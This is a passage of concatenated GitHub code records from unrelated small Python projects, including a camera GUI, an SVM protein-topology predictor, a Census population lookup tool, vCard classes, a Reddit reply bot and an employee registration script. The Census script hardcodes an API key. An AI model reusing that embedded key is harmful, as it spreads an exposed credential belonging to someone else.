print(\"IS_SUCCESS\")\n # else:\n # self.CamSeqKill()\n # ueye.is_ExitCamera(self.hCam)\n # print(\"Error\")\n #\n # # build thread\n # # t = threading.Thread(target=self.job)\n # ueye.is_CaptureVideo(self.hCam, ueye.IS_DONT_WAIT)\n # # ueye.is_CaptureVideo(self.hCam, ueye.IS_DONT_WAIT)\n #\n # self.test_thread = Thread_count(self.hCam, self.width, self.height, self.sInfo, self.m_vpcSeqImgMem,\n # self.bufeersize, self.nBitsPerPixel)\n # self.test_thread.test_signal.connect(self.update_image)\n # self.test_thread.finished.connect(self.savve)\n # self.test_thread.start()\n\n def savve(self):\n # save image\n folder_name = datetime.datetime.now().strftime(\"%Y_%m_%d-%H%M\")\n # os.mkdir(f\"{folder_name}\")\n # self.save_img(self.m_vpcSeqImgMem, self.m_viSeqMemID, folder_name)\n\n self.CamSeqKill()\n\n def save_img(self, mem, iImageID, folder_name: str):\n print(len(mem))\n plast = ueye.c_mem_p()\n\n for i in range(0, len(mem)):\n # process the pointer memory translate to image\n # TODO: add process on get data form image\n\n parameter = 
ueye.IMAGE_FILE_PARAMS(ppcImageMem=mem[i], pnImageID=iImageID[i])\n            parameter.pwchFileName = f\"{folder_name}/{i}.jpeg\"\n            parameter.nQuality = 0\n            parameter.nFileType = ueye.IS_IMG_JPG\n            ueye.is_ImageFile(self.hCam, ueye.IS_IMAGE_FILE_CMD_SAVE, parameter, ueye.sizeof(parameter))\n\n    def CamSeqKill(self):\n        # ueye.is_ExitImageQueue(hCam)\n        ueye.is_ClearSequence(self.hCam)\n        # Free buffer\n        for i in range(0, len(self.m_viSeqMemID)):\n            Ret = ueye.is_FreeImageMem(self.hCam, self.m_vpcSeqImgMem[i], self.m_viSeqMemID[i])\n        self.m_vpcSeqImgMem.clear()\n        self.m_viSeqMemID.clear()\n\n    def update_image(self, data):\n        self.image1.setPixmap(data)\n        self.image1.setScaledContents(True)\n\n    def closeEvent(self, *args, **kwargs):\n        self.image_thread.stop_thr()","repo_name":"kmolLin/PAOM_ids","sub_path":"core/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":14580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"41711283810","text":"# print('''please input a fasta file of the Beta-barrel protein\n# that you want to predict its topology:\n# i: inner-loop, o: outer-loop, m: transmembrane Beta strand\n# path: ''')\n\nimport sys\npath=sys.argv[1]\n\nopenfile=open(path,'r')\nopenfile=openfile.readlines()\nID=openfile[0].rstrip('\\n').lstrip('>')\nID=str(ID)\n# seqstring=openfile[1]\n# seq=[]\n#\n# seq.append(openfile[1])\n\npath=str(path)+'.pssm'\n\nPSIfreq=[]\nwith open(path, 'r') as path:\n    path = path.readlines()\n    for line in path[3:-6]:\n        line = line.split()\n        freq=line[22:42]\n        # print(freq)\n        # print(freq[-1])\n        # freq[1][:0]=zeroes\n        # freq[-1].extend(zeroes)\n        PSIfreq.append(freq)\n    # PSSMlist.append(PSIfreq)\n\nPSIfreqfloat=[]\nfor each_position in PSIfreq:\n    eachres=[]\n    for eachfreq in each_position:\n        eachfreq=(float(eachfreq)/100)\n        # eachfreq=round(eachfreq,2)\n        eachres.append(eachfreq)\n    PSIfreqfloat.append(eachres)\n\n\nzeropad=([float(0)]*20)\n\nws=31\nsp=int(ws/2)\ntemptrainingset=[]\n# eachprotein=[]\n\nproteintest=[]\n\neachproteintest=[]\nfor i in range(0,len(PSIfreqfloat)):\n    if i < sp:\n        # left-pad windows at the start of the sequence with zero vectors\n        # (assumed mirror of the end-of-sequence branch below)\n        beginning=[zeropad]*(sp-i)+PSIfreqfloat[0:(i+sp+1)]\n        beginning=[a for b in beginning for a in b]\n        eachproteintest.append(beginning)\n    elif i >= (len(PSIfreqfloat)-sp):\n        middle=PSIfreqfloat[(i-sp):ws-(sp-i)+1]\n        if len(middle) != ws:\n            middle.extend([zeropad]*(ws-len(middle)))\n        middle=[a for b in middle for a in b]\n        eachproteintest.append(middle)\n    else:\n        w=PSIfreqfloat[(i-sp):(i+sp+1)]\n        w=[a for b in w for a in b]\n        eachproteintest.append(w)#\n\nfrom sklearn.externals import joblib\nfrom sklearn import svm\nclf=joblib.load('linear_svmpredictor.pkl')\npred=clf.predict(eachproteintest)\npredictionresult=list(pred)\ndicfeastates={0:\"i\",1:\"o\",2:\"m\"}\npredictionstring=[]\nfor eachpred in predictionresult:\n    eachpred=dicfeastates[eachpred]\n    predictionstring.append(eachpred)\npredstring=''.join(predictionstring)\n#\n\nprint(\"The prediction of %s is: \" %(ID))\nprint(\" \")\nprint(predstring)\nprint(\"'i'is inner-loop, 'o' is outer-loop, 'm' is transmembrane beta strand\")\nprint(\" \")\n\nwith open('prediction_of_topology.txt', 'w') as fwrite:\n    for i in range(0,len(openfile)):\n        fwrite.write(openfile[i])\n    fwrite.write(\"\\n >%s_prediction_topology \\n\" %(ID))\n    fwrite.write(predstring)\n","repo_name":"kawairine/hello-word","sub_path":"1_final/linearsvmpredictor.py","file_name":"linearsvmpredictor.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"24563967583","text":"# Author: Alyssa Lada\n# Course: CS-361\n# Date Created: 02/2021\n# Date Last 
Modified: 02/14/2021\n# Program Title: Population Generator\n# Description: This program creates a graphic user interface and an outfile.\n# It receives state and year from the user via GUI or an input.csv file, calls the US Census API, and returns\n# the total population for the state and year. The original year and state, and the retrieved population are\n# exported to output.csv in the same directory. The program runs from the command line.\n\n\nfrom tkinter import *\nfrom tkinter import ttk\nimport requests\nimport csv\nimport sys\n\n# Instructions\nprint(\"\\nFor graphic user interface, run on the command line.\")\nprint(\"For csv file input, run on command line.\")\nprint(\"Output.csv will be created in the same directory as the program for the last run query.\")\n\n\ndef create_outfile(input_year, input_state, output_population_size):\n \"\"\"Writes output.csv with year, state, and population info.\"\"\"\n with open(\"output.csv\", 'w', newline='') as out_file:\n writer = csv.writer(out_file)\n writer.writerow([\"input_year\", \"input_state\", \"output_population_size\"])\n writer.writerow([input_year, input_state.upper(), output_population_size])\n print(\"\\nOutput.csv created.\")\n\ndef call_census_api(year, state_code):\n \"\"\"Returns the total population for a given year (2005 - 2019) and two digit state code.\"\"\"\n\n def convert_state_code_to_num(state_code):\n \"\"\"Converts two-letter state code to API numeric code.\"\"\"\n state_abbr_dict = [(\"01\", \"AL\"), (\"02\", \"AK\"), (\"04\", \"AZ\"), (\"05\", \"AR\"),\n (\"06\", \"CA\"), (\"08\", \"CO\"), (\"09\", \"CT\"), (\"10\", \"DE\"),\n (\"11\", \"DC\"), (\"12\", \"FL\"), (\"13\", \"GA\"), (\"15\", \"HI\"),\n (\"16\", \"ID\"), (\"17\", \"IL\"), (\"18\", \"IN\"), (\"19\", \"IA\"),\n (\"20\", \"KS\"), (\"21\", \"KY\"), (\"22\", \"LA\"), (\"23\", \"ME\"),\n (\"24\", \"MD\"), (\"25\", \"MA\"), (\"26\", \"MI\"), (\"27\", \"MN\"),\n (\"28\", \"MS\"), (\"29\", \"MO\"), (\"30\", \"MT\"), (\"31\", \"NE\"),\n (\"32\", \"NV\"), (\"33\", \"NH\"), (\"34\", \"NJ\"), (\"35\", \"NM\"),\n (\"36\", \"NY\"), (\"37\", \"NC\"), (\"38\", \"ND\"), (\"39\", \"OH\"),\n (\"40\", \"OK\"), (\"41\", \"OR\"), (\"42\", \"PA\"), (\"44\", \"RI\"),\n (\"45\", \"SC\"), (\"46\", \"SD\"), (\"47\", \"TN\"), (\"48\", \"TX\"),\n (\"49\", \"UT\"), (\"50\", \"VT\"), (\"51\", \"VA\"), (\"53\", \"WA\"),\n (\"54\", \"WV\"), (\"55\", \"WI\"), (\"56\", \"WY\"), (\"72\", \"PR\")]\n\n state_num = \"*\"\n for tup in state_abbr_dict:\n if tup[1] == state_code.upper():\n state_num = tup[0]\n\n return state_num\n\n # create api url\n hostname = \"https://api.census.gov/data/\"\n data_set_name_acronym = \"acs/acs1\"\n key = \"d19aa6beb1cd793f0c25452ff63400bbe5fb8cd6\"\n state_num = convert_state_code_to_num(state_code)\n url = hostname + year + \"/\" + data_set_name_acronym + \"?get=NAME,B01001_001E&for=state:\" + state_num + \"&key=\" + key\n\n response = requests.get(url)\n\n # convert api response data to display format\n population = response.text.split(\",\")[4][1:-1] # locate and trim population string\n\n return population\n\n\ndef create_GUI():\n \"\"\"GUI to collect year and state input from user.\"\"\"\n\n def get_population(*args):\n \"\"\"Calls call_census_api and create_outfile using year and state textvariables from interface.\"\"\"\n retrieved_population = call_census_api(year.get(), state.get()) # text variables auto update with tk\n\n population.set(retrieved_population) # displays on gui\n\n # automatically create outfile\n create_outfile(year.get(), 
state.get(), retrieved_population)\n\n    # set the main application window\n    root = Tk()\n    root.title(\"Population Generator\")\n\n    # create the content frame window\n    mainframe = ttk.Frame(root, padding=\"12 12 12 12\")\n    mainframe.grid(column=0, row=0, sticky=(N, W, E, S))\n    root.columnconfigure(0, weight=1)\n    root.rowconfigure(0, weight=1)\n\n    # input widget for year selection\n    year = StringVar()\n    year_entry = ttk.Entry(mainframe, width=4, textvariable=year)\n    year_entry.grid(column=2, row=1, sticky=(W, E))\n    ttk.Label(mainframe, text=\"Enter census year (2005-2019):\").grid(column=1, row=1, sticky=(W, E))\n\n    # input widget for state selection\n    state = StringVar()\n    state_entry = ttk.Entry(mainframe, width=2, textvariable=state)  # specify the parent that the widget will be placed inside\n    state_entry.grid(column=2, row=2, sticky=(W, E))\n    ttk.Label(mainframe, text=\"Enter state code (example: TX):\").grid(column=1, row=2, sticky=(W, E))\n\n    # get population button\n    ttk.Button(mainframe, text=\"Get Population\", command=get_population).grid(column=2, row=3, sticky=E)\n\n    # population output screen\n    population = StringVar()\n    ttk.Label(mainframe, text=\"Population: \").grid(column=1, row=4, sticky=(E, W))\n    ttk.Label(mainframe, textvariable=population).grid(column=2, row=4, sticky=(E, W))\n\n    # pad children in mainframe\n    for child in mainframe.winfo_children():\n        child.grid_configure(padx=5, pady=5)\n\n    year_entry.focus()\n    root.bind(\"<Return>\", get_population)\n\n    root.mainloop()\n\n\n# CLI entry point\n# check if command line start has valid argument\nif len(sys.argv) > 1:\n    try:\n        with open(sys.argv[-1], \"r\") as in_file:\n            csv_year_state = in_file.read().splitlines()[1].split(\",\")\n\n        year = csv_year_state[0]\n        state = csv_year_state[1]\n        population = call_census_api(year, state)\n\n        create_outfile(year, state, population)\n\n    except IOError:\n        print(\"Invalid argument\")\nelse:\n    create_GUI()\n\n# Resources\n# https://tkdocs.com/tutorial/firstexample.html\n# https://docs.python.org/3/library/tkinter.html\n# https://www.census.gov/data/developers/guidance/api-user-guide.Example_API_Queries.html\n# https://www.programiz.com/python-programming/csv\n# https://stackoverflow.com/questions/7033987/python-get-files-from-command-line\n# https://docs.python.org/3/library/functions.html#open\n","repo_name":"sudodragon/Population-Generator","sub_path":"population-generator.py","file_name":"population-generator.py","file_ext":"py","file_size_in_byte":6261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"692923583","text":"from ..value import vValue, vTextValue, vBinaryValue\nfrom ..parameter import vParameterList, vParameter\n\nfrom .attribute import vAttribute, vAttributeType\n\nclass vAbstractTextAttr( vAttribute ):\n    # abstract class implementing an attribute-type with a single text value\n\n    # class attribute storing the decoded value\n    _value_class_attr_name = 'text'\n    \n    def __init__(self):\n        text_value = vTextValue( \"\" )\n        self.__setattr__( self._value_class_attr_name, text_value )\n        super().__init__()\n\n    def encode_value(self):\n        text_value = getattr(self, self._value_class_attr_name )\n        return text_value.escape()\n\n    def decode_value(self, value):\n        self._value = vTextValue( value )\n        text_value = self._value.unescape()\n        setattr( self, self._value_class_attr_name, text_value )\n\nclass vAbstractTextListAttr( vAttribute ):\n    # abstract class implementing an attribute-type with a single text list value\n\n    # class 
attribute storing the decoded value list\n _value_class_attr_name = 'text'\n \n def __init__(self):\n self.__setattr__( self._value_class_attr_name, [] )\n super().__init__()\n\n def encode_value(self):\n text_value_list = getattr(self, self._value_class_attr_name )\n str_value_list = [ str(c.escape()) for c in text_value_list ]\n return vTextValue(',').join( str_value_list )\n\n def decode_value(self, value):\n self._value = vTextValue( value )\n text_value_list = self._value.escaped_split( ',', unescape_parts=True )\n setattr( self, self._value_class_attr_name, text_value_list )\n\nclass vAbstractStructTextAttr( vAttribute ):\n # abstract class for structured text attributes: \n # a list of components (lists of text-value) with fixed semantic \n\n # list of class attribute names. The order corresponds to the semantic \n # defined in the RFCs\n _component_order = ( )\n\n def __init__(self):\n for prop_name in self._component_order:\n setattr(self, prop_name, [] )\n super().__init__()\n\n def encode_value(self):\n struct_str_list = []\n for prop_name in self._component_order:\n text_value_list = getattr( self, prop_name )\n str_value_list = [ str(c.escape()) for c in text_value_list ]\n struct_str_list.append( ','.join(str_value_list) )\n return vTextValue(';').join( struct_str_list )\n\n def decode_value(self, value):\n self._value = vTextValue( value )\n struct = self._value.escaped_split( ';' )\n len_diff = len( self._component_order ) - len( struct )\n if len_diff > 0:\n struct.extend( [ vTextValue(\"\") for i in range(len_diff) ] )\n\n for i in range( len(self._component_order) ):\n text_value_list = struct[ i ].escaped_split( ',', unescape_parts=True )\n setattr( self, self._component_order[i], text_value_list )\n\nclass vAbstractBinaryUriAttr( vAttribute ):\n # abstract class implementing a binary value type with inline or url content\n \n def __init__(self):\n super().__init__()\n self._uri = vValue( '' )\n self._data = vBinaryValue( b'' )\n\n @property\n def has_uri(self):\n value_param = self._params.get( 'value', default=vParameter() )\n return value_param.has_value( 'uri', ignorecase=True )\n\n @property\n def uri(self):\n return self._uri\n\n @uri.setter\n def uri(self, uri):\n self._params.set( 'value', 'uri' )\n self._uri = vValue( uri )\n \n @property\n def data(self):\n return self._data\n\n @data.setter\n def data(self, data):\n del self.params['value']\n self._params.set( 'encoding', 'b' )\n self._data = vBinaryValue( data )\n \n def encode_value(self):\n if self.has_uri:\n return vValue( self._uri )\n return vBinaryValue( self._data )\n\n def decode_value(self, value):\n if self.has_uri:\n self._value = vValue( value )\n self._uri = self._value\n self._data = vBinaryValue( b'' )\n else:\n self._value = vBinaryValue( value )\n self._uri = vValue( '' )\n self._data = self._value\n self._params.set( 'encoding', 'b' )\n","repo_name":"ObviusOwl/eml-vcard-export","sub_path":"eml_vcard_export/vcard/attributes/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26253553891","text":"def is_palindrome(string):\n formatted_string = ''.join(filter(str.isalpha, string)).lower()\n length = len(formatted_string)\n for i in range(length):\n if formatted_string[i] != formatted_string[length - i - 1]:\n return False\n return True\n \n\ndef main():\n test_values = [\n 'Казак',\n 'А роза упала на лапу Азора', \n 'Do geese see God?', \n 'Madam, I’m Adam',\n 
'nonPalindromicString',\n        'WhatIsThisTest'\n    ]\n    assert_values = [True, True, True, True, False, False]\n    for test_val, assert_val in zip(test_values, assert_values):\n        print(f'Expected: {assert_val}; Received: {is_palindrome(test_val)}')\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"reproductionprohibited/intensive-dev-lyceum-1580-2022","sub_path":"palindrom.py","file_name":"palindrom.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1748399025","text":"import xml.sax\nimport xml.sax.handler\nimport sys\n\n\nclass Handler(xml.sax.handler.ContentHandler):\n    def startElement(self, name, qname, attrs):\n        print(\"Start:\", name, qname)\n\n    def endElement(self, name, qname):\n        print(\"End:\", name, qname)\n\n    def characters(self, content):\n        print(\"character:\" + content)\n        return \n\nif __name__==\"__main__\":\n    parser = xml.sax.make_parser()\n    parser.setContentHandler(Handler())\n    parser.setFeature(xml.sax.handler.feature_namespaces, True)\n    parser.parse(sys.argv[1])","repo_name":"KeigoMatsumura/NLP-lecture-practice","sub_path":"lecture3/anlp-03-1.py","file_name":"anlp-03-1.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"16835339347","text":"from __future__ import print_function\nimport unittest\n\nimport numpy as np\nfrom scipy.special import expit, erf\n\nfrom paddle.fluid.tests.unittests.op_test import OpTest, convert_float_to_uint16\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nimport paddle.fluid as fluid\nimport paddle.fluid.core as core\nfrom paddle.fluid import compiler, Program, program_guard\n\npaddle.enable_static()\nSEED = 2049\n\n\nclass TestExpNPUOP(OpTest):\n    def setUp(self):\n\n        self.set_npu()\n        self.place = paddle.NPUPlace(0)\n        self.op_type = \"exp\"\n        self.init_dtype()\n        self.init_kernel_type()\n\n        np.random.seed(SEED)\n        x = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)\n        out = np.exp(x)\n\n        self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}\n        self.outputs = {'Out': out}\n\n    def test_check_output(self):\n        self.check_output_with_place(self.place)\n\n    def test_check_grad(self):\n        self.check_grad_with_place(self.place, ['X'], 'Out')\n\n    def init_dtype(self):\n        self.dtype = np.float32\n\n    def init_kernel_type(self):\n        pass\n\n    def set_npu(self):\n        self.__class__.use_npu = True\n\n\nclass TestExpNPUOPFloat64(TestExpNPUOP):\n    def init_dtype(self):\n        self.dtype = np.float64\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"EnnSou/ooss-paddle2.3","sub_path":"python/paddle/fluid/tests/unittests/npu/test_exp_op_npu.py","file_name":"test_exp_op_npu.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
{"seq_id":"44268483752","text":"# Minimum Cost For Tickets. The write-ups call this a backward DP, but the forward direction works just as well; this problem should be quite straightforward.\n# Build res indexed by day: the current entry is the minimum of res[i-1], res[i-7] and res[i-30], each plus the corresponding ticket cost.\n# If i < 7 or i < 30, simply fall back to the 7-day and 30-day pass prices for that day.\nclass Solution(object):\n    def mincostTickets(self, days, costs):\n        \"\"\"\n        :type days: List[int]\n        :type costs: List[int]\n        :rtype: int\n        \"\"\"\n        # res = [0]*400\n        # if days[-1]==365:\n        #     days.pop()\n        # res[365] = costs[0]\n        # for i in range(364,0,-1):\n        #     if days!=[] and i == days[-1]:\n        #         days.pop()\n        #         res[i] = min(res[i+1]+costs[0],res[i+7]+costs[1],res[i+30]+costs[2])\n        #     else:\n        #         res[i] = res[i+1]\n        # return res[1]\n        \n        res = 
[0]*(days[-1]+1)\n k = 0\n for i in range(1,len(res)):\n if i!=days[k]:\n res[i] = res[i-1]\n else:\n a,b,c = costs[0],costs[1],costs[2]\n k += 1\n a = res[i-1]+costs[0]\n if i-7>=0:\n b = res[i-7]+costs[1]\n if i-30>=0:\n c = res[i-30]+costs[2]\n res[i] = min(a,b,c)\n return res[-1]\n","repo_name":"whywhs/Leetcode","sub_path":"Leetcode983_M.py","file_name":"Leetcode983_M.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71343045905","text":"from prettytable import PrettyTable\n\n\ndef output_base(base_name):\n my_table = PrettyTable()\n my_table.field_names = [\"Фамилия Имя\", \"Возраст\", \"Пол\"]\n try:\n with open(fr'../txt/{base_name}', 'r', encoding='utf-8') as fr:\n for i in fr:\n row = i.strip().split()\n full_name = \" \".join(row[:2])\n my_table.add_row([full_name, row[2], row[3]])\n print(my_table)\n except FileNotFoundError:\n print(f\"Базы c именем '{base_name}' нет\")\n\n\ndef write_read_base(base_name, key, employees=[]):\n with open(f'../txt/{base_name}', key, encoding='utf-8') as fw:\n if key == 'r':\n f = fw.readlines()\n return f\n for i in employees:\n print(i, file=fw)\n","repo_name":"Kvezac/homework21","sub_path":"lesson21_homework/python/write_read_file.py","file_name":"write_read_file.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20190057089","text":"car_dict = {}\n\nmakes = (\n (1, \"Toyota\"), (2, \"Nissan\"),\n (3, \"Ford\"), (4, \"Mini\"),\n (5, \"Honda\"), (6, \"Dodge\"),\n)\n\nmodels = (\n (1, \"Altima\", 2), (2, \"Thunderbird\", 3),\n (3, \"Dart\", 6), (4, \"Accord\", 5),\n (5, \"Prius\", 1), (6, \"Countryman\", 4),\n (7, \"Camry\", 1), (8, \"F150\", 3),\n (9, \"Civic\", 5), (10, \"Ram\", 6),\n (11, \"Cooper\", 4), (12, \"Pilot\", 5),\n (13, \"Xterra\", 2), (14, \"Sentra\", 2),\n (15, \"Charger\", 6)\n)\n\ncolors = (\n (1, \"Black\" ), (2, \"Charcoal\" ), (3, \"Red\" ), (4, \"Brick\" ),\n (5, \"Blue\" ), (6, \"Navy\" ), (7, \"White\" ), (8, \"Ivory\" )\n)\n\navailable_car_colors = (\n (1, 1), (1, 2), (1, 7), \n (2, 1), (2, 3), (2, 7), \n (3, 2), (3, 3), (3, 7), \n (4, 3), (4, 5), (4, 8),\n (5, 2), (5, 4), (5, 8), \n (6, 2), (6, 6), (6, 7), \n (7, 1), (7, 3), (7, 7), \n (8, 1), (8, 5), (8, 8),\n (9, 1), (9, 6), (9, 7), \n (10, 2), (10, 5), (10, 7), \n (11, 3), (11, 6), (11, 8), \n (12, 1), (12, 4), (12, 7),\n (13, 2), (13, 6), (13, 8), \n (14, 2), (14, 5), (14, 8), \n (15, 1), (15, 4), (15, 7)\n)\n\n# STEP 1 GRAB MAKES\n# make[1] for make in makes\n\n# STEP 2 GRAB MODELS\n# for model in models if model[2] == make[0]\n\n# STEP 3 LOOP THROUGH AVAILABLE COLORS AND COLOR CODES TO FIND MATCHES AND BUILD LIKE DICTIONARY\n# color[1] for available_car_color in available_car_colors for color in colors if model[0] == available_car_color[0] if available_car_color[1] == color[0]\n# {\n# make: {\n# model: [color, color, color]\n# model: [color, color, color]\n# },\n# model: [color, color, color]\n# model: [color, color, color]\n# }\n# ...\n# }\n\ncar_dicto = {\n make[1]:\n {\n model[1]: \n [color[1] for available_car_color in available_car_colors \n for color in colors if model[0] == available_car_color[0] if available_car_color[1] == color[0]] for model in models if model[2] == make[0]\n }\n for make in makes\n }\n\n# STEP 4 PRINT IT OUT\nfor k, v in car_dicto.items():\n print('\\n' + k + '\\n-----------------------------')\n for model in v:\n print(\"{0} 
available in {1}\".format(model, ', '.join(v[model])))\n","repo_name":"mccordgh/python_bangazon_orientation_exercise_CHALLENGE_CARS","sub_path":"cars.py","file_name":"cars.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33527940520","text":"from __future__ import division\n#\n# Copyright (c) 2015 Juniper Networks, Inc. All rights reserved.\n#\nfrom builtins import range\nfrom past.utils import old_div\nimport unittest\nimport tempfile\n\nimport sys, os, mock, gevent\n#sys.path.insert(0, os.path.abspath(\"..\"))\n#sys.path.append('../../tools/sandesh/library/python')\n\nmock_pkg = mock.MagicMock(name='mock_vnc_api')\nmock_mod = mock.MagicMock(name='mock_vnc_api_mod')\nmock_cls = mock.MagicMock(name='mock_VncApi')\nmock_mod.VncApi = mock_cls\nmock_pkg.vnc_api = mock_mod\n\nsys.modules['vnc_api'] = mock_pkg\nsys.modules['vnc_api.vnc_api'] = mock_mod\n\nfrom tf_snmp_collector.device_config import DeviceConfig\nfrom tf_snmp_collector.snmpctrlr import MaxNinTtime\n\n\nclass SnmpTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n pass\n #if (os.getenv('LD_LIBRARY_PATH', '').find('build/lib') < 0):\n # if (os.getenv('DYLD_LIBRARY_PATH', '').find('build/lib') < 0):\n # assert(False)\n\n #cls.cassandra_port = AnalyticsTest.get_free_port()\n #mockcassandra.start_cassandra(cls.cassandra_port)\n\n @classmethod\n def tearDownClass(cls):\n pass\n #mockcassandra.stop_cassandra(cls.cassandra_port)\n\n def write_file(self, s):\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(s)\n f.close()\n return f.name\n\n def write_cfg_file(self):\n return self.write_file('[DEFAULTS]\\nfile = dev.ini')\n\n def write_dev_file(self):\n return self.write_file('[1.1.1.1]\\nCommunity = public\\nVersion = 2')\n\n def delete_file(self, filename):\n if os.path.exists(filename):\n os.unlink(filename)\n\n def systestsetUp(self):\n self.cfgfl = self.write_cfg_file()\n self.devfl = self.write_dev_file()\n self.http_port = 9042\n self.dfgp = CfgParser(\n '-c %s --file %s --http_server_port %d' % (self.cfgfl,\n self.devfl, self.http_port))\n self.tasks = []\n self.vizd_obj = None\n\n\n def systesttearDown(self):\n self.delete_file(self.cfgfl)\n self.delete_file(self.cfgfl)\n\n def test_000_snmp_devcfg(self):\n #logging.info(\"%%% test_000_snmp_devcfg %%%\")\n self.assertEqual(1, 1)\n\nclass MaxNinTtimeTest(unittest.TestCase):\n def setUp(self):\n self.n = 5\n self.t = 5\n self.mntt = MaxNinTtime(self.n, self.t)\n\n def test_000_addone(self):\n self.assertEqual(len(self.mntt._slots), self.n)\n self.mntt.add()\n self.assertEqual(self.mntt._pointer, 1)\n\n def test_010_addmore(self):\n ts = [self.mntt.add() for i in range(self.n + old_div(self.n,2))]\n self.assertEqual(len([p for p in [t-ts[\n i-1] for i,t in enumerate(ts)][1:] if p>old_div(self.t,2)]), 1) #one jump\n\n def test_020_fs(self):\n ts = [self.mntt.add() for i in range(self.n + old_div(self.n,2))]\n self.assertFalse(self.mntt.ready4full_scan())\n gevent.sleep(self.t + .1)\n self.assertTrue(self.mntt.ready4full_scan())\n\nif __name__ == '__main__':\n unittest.main(catchbreak=True)\n","repo_name":"tungstenfabric/tf-analytics","sub_path":"tf-snmp-collector/tf_snmp_collector/tests/snmp_test.py","file_name":"snmp_test.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"2724172237","text":"import praw\nimport time\nimport re\n\nreddit = 
praw.Reddit('bot1')\nuser = reddit.redditor('the-hug-bot')\n\nregexMatch = '.*need.*hug'\n\nmentalHealthSubreddits = [\n\"mentalHealth\",\n\"tifu\",\n\"raisedbynarcissists\",\n\"act\",\n\"sat\",\n\"applyingtocollege\",\n\"teenagers\",\n\"insaneparents\",\n\"apstudents\",\n\"offmychest\"\n]\n\n'''\n# Testing environment\nmentalHealthSubreddits = [\n\"7iooibottesting\"\n]\n'''\n\n\nglobal commentList\ncommentList = []\n\ndef processComment(comment):\n global commentList\n commentID = comment.id\n if commentID not in commentList:\n bodyText = comment.body\n if re.search(regexMatch, bodyText, re.IGNORECASE):\n comment.reply(\"*Hug*\")\n print(\"New comment posted.\\n\", flush=True)\n commentList.append(commentID)\n\n\nwhile True:\n for sub in mentalHealthSubreddits:\n #print(commentList, flush=True)\n #print(\"Reading new subreddit...\\n\" + sub, flush=True)\n for comment in reddit.subreddit(sub).stream.comments(pause_after=0):\n time.sleep(0.01)\n if comment is None:\n break\n else:\n try:\n processComment(comment)\n except:\n print(\"Comment processing produced an error. Trying to wait to resolve problem.\", flush=True) #New accounts are rate limited\n time.sleep(60)\n try:\n processComment(comment)\n except:\n print(\"Failure! RATELIMIT is either too high or there is a fatal problem.\", flush=True)\n","repo_name":"jacob-zietek/RedditHugBot","sub_path":"HugBot.py","file_name":"HugBot.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14286841417","text":"import csv\r\nfrom colorama import Fore, Style\r\nfrom prettytable import PrettyTable\r\nimport pyfiglet\r\nimport time\r\nimport os\r\n\r\n\r\nclass registration():\r\n e_name = ''\r\n age = ''\r\n date_of_birth = ''\r\n e_id = ''\r\n e_id_number = ''\r\n address = ''\r\n contact = ''\r\n email = ''\r\n\r\n def register_data(self):\r\n\r\n with open(\"registration.csv\", 'a', newline='') as file:\r\n data = csv.writer(file)\r\n\r\n while True:\r\n self.e_name = input(\"name: \")\r\n self.age = input(\"age: \")\r\n self.date_of_birth = input(\"date of birth: \")\r\n self.e_id = input(\"employee id: \")\r\n\r\n flag = 0\r\n while flag == 0:\r\n self.e_id_number = input(\"employee id number(AADHAR): \")\r\n if len(self.e_id_number) != 12:\r\n print('enter 12 digit id_number')\r\n flag = 0\r\n else:\r\n flag = 1\r\n\r\n self.address = input(\"address: \")\r\n\r\n flag = 0\r\n while flag == 0:\r\n self.contact = input(\"contact: \")\r\n if len(self.contact) != 10:\r\n print('enter 10 digit contact number')\r\n flag = 0\r\n else:\r\n flag = 1\r\n self.email = input(\"email: \")\r\n\r\n record = [self.e_name, self.age, self.date_of_birth, self.e_id,\r\n self.e_id_number, self.address, self.contact, self.email]\r\n print(record)\r\n data.writerow(record)\r\n ch = input(\"want to enter more data? 
